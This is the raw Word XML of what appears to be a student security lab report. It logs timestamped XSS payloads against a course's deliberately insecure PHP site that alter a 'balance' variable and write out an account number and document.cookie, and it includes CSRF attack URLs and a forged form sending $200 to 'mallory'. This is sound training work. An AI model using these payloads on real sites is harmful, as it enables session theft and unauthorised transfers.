          <w:p w14:paraId="07B7D3DB" w14:textId="368CC916" w:rsidR="00276DBA" w:rsidRPr="00FF34D2" w:rsidRDefault="00276DBA" w:rsidP="003420DE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&lt;script&gt;\</w:t>
            </w:r>
            <w:proofErr w:type="spell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nbalance</w:t>
            </w:r>
            <w:proofErr w:type="spell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10000000000;\</w:t>
            </w:r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n&lt;/script&gt;tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32472990" w14:textId="178DE008" w:rsidR="00276DBA" w:rsidRPr="00FF34D2" w:rsidRDefault="00276DBA" w:rsidP="00913622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15:10:54 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00276DBA" w14:paraId="60F74F3F" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="075E8870" w14:textId="472F325B" w:rsidR="00276DBA" w:rsidRPr="00FF34D2" w:rsidRDefault="00276DBA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&lt;script&gt;\</w:t>
            </w:r>
            <w:proofErr w:type="spell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nbalance</w:t>
            </w:r>
            <w:proofErr w:type="spell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10000000000;\</w:t>
            </w:r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n&lt;/script&gt;tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50A4E523" w14:textId="21DEAD07" w:rsidR="00276DBA" w:rsidRPr="00FF34D2" w:rsidRDefault="00276DBA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15:11:34 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00276DBA" w14:paraId="25E3C381" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40D0DBB6" w14:textId="77777777" w:rsidR="00276DBA" w:rsidRPr="00FF34D2" w:rsidRDefault="00276DBA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%3Cscript%3E%5Cnbalance%3D10000000000%3B%5Cn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="333D69DA" w14:textId="66AE1E64" w:rsidR="00276DBA" w:rsidRPr="00FF34D2" w:rsidRDefault="00276DBA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%3C%2Fscript%3Etkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5612AF81" w14:textId="353365CE" w:rsidR="00276DBA" w:rsidRPr="00FF34D2" w:rsidRDefault="00276DBA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15:12:41 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F7E67" w14:paraId="7BBFF7CC" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02D6A910" w14:textId="2718ED4B" w:rsidR="008F7E67" w:rsidRPr="00FF34D2" w:rsidRDefault="008F7E67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&lt;script&gt;balance=10000000;&lt;/script&gt;tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00208CA3" w14:textId="7ABCB614" w:rsidR="008F7E67" w:rsidRPr="00FF34D2" w:rsidRDefault="008F7E67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15:26:51 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F7E67" w14:paraId="75C232AA" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="580098BA" w14:textId="51C9B76D" w:rsidR="008F7E67" w:rsidRPr="00FF34D2" w:rsidRDefault="008F7E67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&lt;script&gt;balance=100000000;&lt;/script&gt;tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29EFF622" w14:textId="5479F02C" w:rsidR="008F7E67" w:rsidRPr="00FF34D2" w:rsidRDefault="008F7E67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 xml:space="preserve">This page served at Sun, 26 Mar 2023 15:28:28 -0400 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0066454B" w14:paraId="009A9502" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="434AE2B1" w14:textId="77777777" w:rsidR="00F46FFE" w:rsidRPr="00FF34D2" w:rsidRDefault="00000000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4" w:history="1">
              <w:r w:rsidR="0066454B"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https://andromeda.cs.virginia.edu/~insecure/xss.php?name=</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4147A8E6" w14:textId="13446E5F" w:rsidR="0066454B" w:rsidRPr="00FF34D2" w:rsidRDefault="0066454B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%3Cscript%3Ebalance%3D100000000%3B%3C%2Fscript%3Etkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="752752A6" w14:textId="35347639" w:rsidR="0066454B" w:rsidRPr="00FF34D2" w:rsidRDefault="0066454B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15:40:38 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0066454B" w14:paraId="35D984F6" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0076CDA4" w14:textId="77777777" w:rsidR="0066454B" w:rsidRPr="00FF34D2" w:rsidRDefault="00000000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5" w:history="1">
              <w:r w:rsidR="0066454B"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https://andromeda.cs.virginia.edu/~insecure/xss.php?name=</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="24AD258C" w14:textId="68BBAFA4" w:rsidR="0066454B" w:rsidRPr="00FF34D2" w:rsidRDefault="0066454B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%3Cscript%3Ebalance%3D100000000%3B%3C%2Fscript%3Etkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21863CDC" w14:textId="4FF1940A" w:rsidR="0066454B" w:rsidRPr="00FF34D2" w:rsidRDefault="0066454B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15:41:21 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0066454B" w14:paraId="2761A38D" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C17B655" w14:textId="09DAB8E0" w:rsidR="00F46FFE" w:rsidRPr="00FF34D2" w:rsidRDefault="00000000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F46FFE"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https://andromeda.cs.virginia.edu/~insecure/xss.php?name=</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1039D3FB" w14:textId="2AE77246" w:rsidR="0066454B" w:rsidRPr="00FF34D2" w:rsidRDefault="0066454B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%3Cscript%3E%5Cnbalance%3D100000000%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D38CC25" w14:textId="7595D5D9" w:rsidR="0066454B" w:rsidRPr="00FF34D2" w:rsidRDefault="0066454B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3B%5Cn%3C%2Fscript%3Etkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06FCB2BD" w14:textId="27D3D120" w:rsidR="0066454B" w:rsidRPr="00FF34D2" w:rsidRDefault="0066454B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15:45:06 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F46FFE" w14:paraId="650E9E67" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44895072" w14:textId="5828364D" w:rsidR="00F46FFE" w:rsidRPr="00FF34D2" w:rsidRDefault="00000000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F46FFE"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</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00F46FFE" w:rsidRPr="00FF34D2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14:paraId="335DCC65" w14:textId="1D3CE77C" w:rsidR="00F46FFE" w:rsidRPr="00FF34D2" w:rsidRDefault="00F46FFE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=%3cscript%3ebalance%3d100000000%3b%3c%2fscript%3etkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30771FE0" w14:textId="574771B4" w:rsidR="00F46FFE" w:rsidRPr="00FF34D2" w:rsidRDefault="00F46FFE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15:52:21 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00271EB0" w14:paraId="2C07D77D" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0587F5AB" w14:textId="42FD6DF8" w:rsidR="00271EB0" w:rsidRPr="00FF34D2" w:rsidRDefault="00D756E9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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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document.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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accountNumber</w:t>
            </w:r>
            <w:proofErr w:type="spell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);&lt;/script&gt;tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BE85B6A" w14:textId="47EFFD89" w:rsidR="00271EB0" w:rsidRPr="00FF34D2" w:rsidRDefault="00D756E9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16:12:36 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D756E9" w14:paraId="2D57399F" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="028843EC" w14:textId="6791EAD9" w:rsidR="00D756E9" w:rsidRPr="00FF34D2" w:rsidRDefault="00000000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D756E9"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https://andromeda.cs.virginia.edu/~insecure/xss.php?userid=</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="46BED44D" w14:textId="6D12BA76" w:rsidR="00D756E9" w:rsidRPr="00FF34D2" w:rsidRDefault="00D756E9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%3cscript%3edocument.write(accountNumber)%3b%3c%2fscript%3etkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21E37048" w14:textId="0C1835B6" w:rsidR="00D756E9" w:rsidRPr="00FF34D2" w:rsidRDefault="00D756E9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16:17:35 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F2F09" w14:paraId="04434B8E" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63B13BF6" w14:textId="49C1EF67" w:rsidR="003F2F09" w:rsidRPr="00FF34D2" w:rsidRDefault="003C7FFC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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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document.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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document.cookie</w:t>
            </w:r>
            <w:proofErr w:type="spell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);&lt;/script&gt;tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21563BDD" w14:textId="49EEBECB" w:rsidR="003F2F09" w:rsidRPr="00FF34D2" w:rsidRDefault="003C7FFC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16:34:18 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7FFC" w14:paraId="79A1CCD2" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33082714" w14:textId="4419995F" w:rsidR="003C7FFC" w:rsidRPr="00FF34D2" w:rsidRDefault="003C7FFC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Tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AD006CD" w14:textId="1335CAD8" w:rsidR="003C7FFC" w:rsidRPr="00FF34D2" w:rsidRDefault="003C7FFC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16:34:40 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7FFC" w14:paraId="03CD4891" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="576C54D1" w14:textId="215C68F9" w:rsidR="003C7FFC" w:rsidRPr="00FF34D2" w:rsidRDefault="00000000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9" w:history="1">
              <w:r w:rsidR="003C7FFC"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https://andromeda.cs.virginia.edu/~insecure/xss.php?userid=</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1793A651" w14:textId="18CEFA7D" w:rsidR="003C7FFC" w:rsidRPr="00FF34D2" w:rsidRDefault="003C7FFC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%3cscript%3edocument.write(</w:t>
            </w:r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document.cookie</w:t>
            </w:r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)%3b%3c%2fscript%3etkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16603490" w14:textId="0C2158B0" w:rsidR="003C7FFC" w:rsidRPr="00FF34D2" w:rsidRDefault="003C7FFC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16:36:37 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7FFC" w14:paraId="244F1F3E" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A5A6761" w14:textId="102FC426" w:rsidR="00FF34D2" w:rsidRPr="00FF34D2" w:rsidRDefault="00000000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10" w:history="1">
              <w:r w:rsidR="00FF34D2"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https://andromeda.cs.virginia.edu/~insecure/xss.php?userid=</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="61BF34E3" w14:textId="05BD4DB2" w:rsidR="003C7FFC" w:rsidRPr="00FF34D2" w:rsidRDefault="003C7FFC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%3cscript%3edocument.write(</w:t>
            </w:r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document.cookie</w:t>
            </w:r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)%3b%3c%2fscript%3etkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F5CC06D" w14:textId="551EC045" w:rsidR="003C7FFC" w:rsidRPr="00FF34D2" w:rsidRDefault="00FF34D2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16:42:04 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF34D2" w14:paraId="686E1FC0" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E1F07CD" w14:textId="1DD79F44" w:rsidR="00FF34D2" w:rsidRPr="00FF34D2" w:rsidRDefault="00FF34D2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Tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="177B18AB" w14:textId="7CB8FDF5" w:rsidR="00FF34D2" w:rsidRPr="00FF34D2" w:rsidRDefault="00FF34D2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16:42:21 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF34D2" w14:paraId="0409AA30" w14:textId="77777777" w:rsidTr="004C7DB0">
        <w:trPr>
          <w:trHeight w:val="647"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3324EEBB" w14:textId="271A70DB" w:rsidR="00FF34D2" w:rsidRPr="00FF34D2" w:rsidRDefault="00FF34D2" w:rsidP="00FF34D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&lt;script&gt;balance=100000000;&lt;/script&gt;tkj9ep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AE73C86" w14:textId="017878C2" w:rsidR="00FF34D2" w:rsidRPr="00FF34D2" w:rsidRDefault="00FF34D2" w:rsidP="00FF34D2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16:42:59 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71F5196F" w14:textId="5520B5CD" w:rsidR="00B11099" w:rsidRPr="00B11099" w:rsidRDefault="00D756E9" w:rsidP="00B110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Number: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D756E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2625059562</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E46562E" w14:textId="2B2AEAF7" w:rsidR="005B01F4" w:rsidRDefault="005B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84D814" w14:textId="439CEC9D" w:rsidR="00FF34D2" w:rsidRDefault="005B01F4" w:rsidP="005B01F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CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762E1860" w14:textId="5CB3FC19" w:rsidR="00BC1DDD" w:rsidRPr="00BC1DDD" w:rsidRDefault="00BC1DDD" w:rsidP="00BC1DD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Site 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F6B9F3" w14:textId="1BA8F631" w:rsidR="005B01F4" w:rsidRDefault="00000000" w:rsidP="00BC1DDD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85335D" w:rsidRPr="00F61542">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://andromeda.cs.virginia.edu/~insecure/csrf.php?amount=200&amp;to=mallory</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A3D912D" w14:textId="2BDBEDF1" w:rsidR="0085335D" w:rsidRDefault="0085335D" w:rsidP="00BC1D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81991F" w14:textId="77777777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>&lt;form action="https://andromeda.cs.virginia.edu/~insecure/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC724A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>csrf.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC724A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>" name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC724A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC724A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>" method="post"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDC11B4" w14:textId="77777777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 xml:space="preserve">    &lt;p&gt;Transfer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019FFF42" w14:textId="77777777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 xml:space="preserve">    &lt;select name="amount"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72104AC9" w14:textId="77777777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 xml:space="preserve">    &lt;option value="0" selected="selected"&gt;$0&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7611E99E" w14:textId="77777777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 xml:space="preserve">    &lt;option value="20"&gt;$20&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283C4DA8" w14:textId="77777777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 xml:space="preserve">    &lt;option value="40"&gt;$40&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7BF83B" w14:textId="77777777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 xml:space="preserve">    &lt;option value="60"&gt;$60&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEEACE0" w14:textId="77777777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 xml:space="preserve">    &lt;option value="80"&gt;$80&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216AE51E" w14:textId="77777777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 xml:space="preserve">    &lt;option value="100"&gt;$100&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CD1D1F" w14:textId="0A490DB4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 xml:space="preserve">    &lt;/select&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6AA544" w14:textId="08464170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 xml:space="preserve">    to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0253158C" w14:textId="77777777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 xml:space="preserve">    &lt;select name="to"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486E484B" w14:textId="77777777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 xml:space="preserve">    &lt;option value="" selected="selected"&gt;----- select one -----&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D83413" w14:textId="77777777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>&lt;option value="egoists"&gt;Egoists Anonymous&lt;/option&gt;&lt;option value="redundancy"&gt;The Society for Redundancy Society&lt;/option&gt;&lt;option value="yacht"&gt;The Help Me Fix My Yacht Kickstarter&lt;/option&gt;&lt;option value="vagueness"&gt;Vagueness or Something Association&lt;/option&gt;&lt;option value="apostrophe"&gt;Misplaced Apostrophe's Anonymous&lt;/option&gt;&lt;option value="mediocrity"&gt;International Mediocrity Foundation&lt;/option&gt;&lt;option value="utopia"&gt;Utopians For A Better Society&lt;/option&gt;&lt;option value="fame"&gt;Fame Seekers Anonymous&lt;/option&gt;&lt;option value="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC724A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>codep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC724A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>"&gt;Codependency Cooperative&lt;/option&gt;&lt;option value="moon"&gt;The Flat Moon Society&lt;/option&gt;    &lt;/select&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279EFD85" w14:textId="2ECD5C78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>&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197095A9" w14:textId="77777777" w:rsidR="00AC724A" w:rsidRPr="00BA7607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  <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7607">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;input type="hidden" name="amount" value="200"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2A2CAB" w14:textId="77777777" w:rsidR="00AC724A" w:rsidRPr="00BA7607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  <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7607">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;input type="hidden" name="to" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0958F6F8" w14:textId="735F6C5F" w:rsidR="00AC724A" w:rsidRP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BA7607">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">       value="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA7607">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mallory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA7607">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F440920" w14:textId="3354DA9E" w:rsidR="00AC724A" w:rsidRDefault="00AC724A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C724A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;input type="submit"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5953B0C5" w14:textId="7AB15971" w:rsidR="00F00CD3" w:rsidRDefault="00F00CD3" w:rsidP="00AC724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84C3CC8" w14:textId="4E495448" w:rsidR="00F00CD3" w:rsidRDefault="00F00CD3" w:rsidP="00AC724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Site 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DD143F" w14:textId="2AA3DE4D" w:rsidR="00AB1135" w:rsidRDefault="00000000" w:rsidP="00AC724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hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00321523" w:rsidRPr="00F61542">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://andromeda.cs.virginia.edu/~insecure/csrf.php?csrf_token=123456789&amp;amount=200&amp;to=mallory</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2EA2817F" w14:textId="66A068D2" w:rsidR="00321523" w:rsidRDefault="00321523" w:rsidP="00AC724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9C40CD1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&lt;form action="https://andromeda.cs.virginia.edu/~insecure/csrf.php?token" name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1641">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1641">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>" method="post"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212CA164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&lt;p&gt;Transfer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48384FA5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&lt;select name='amount'&gt;</w:t>
      </w:r>
    </w:p>
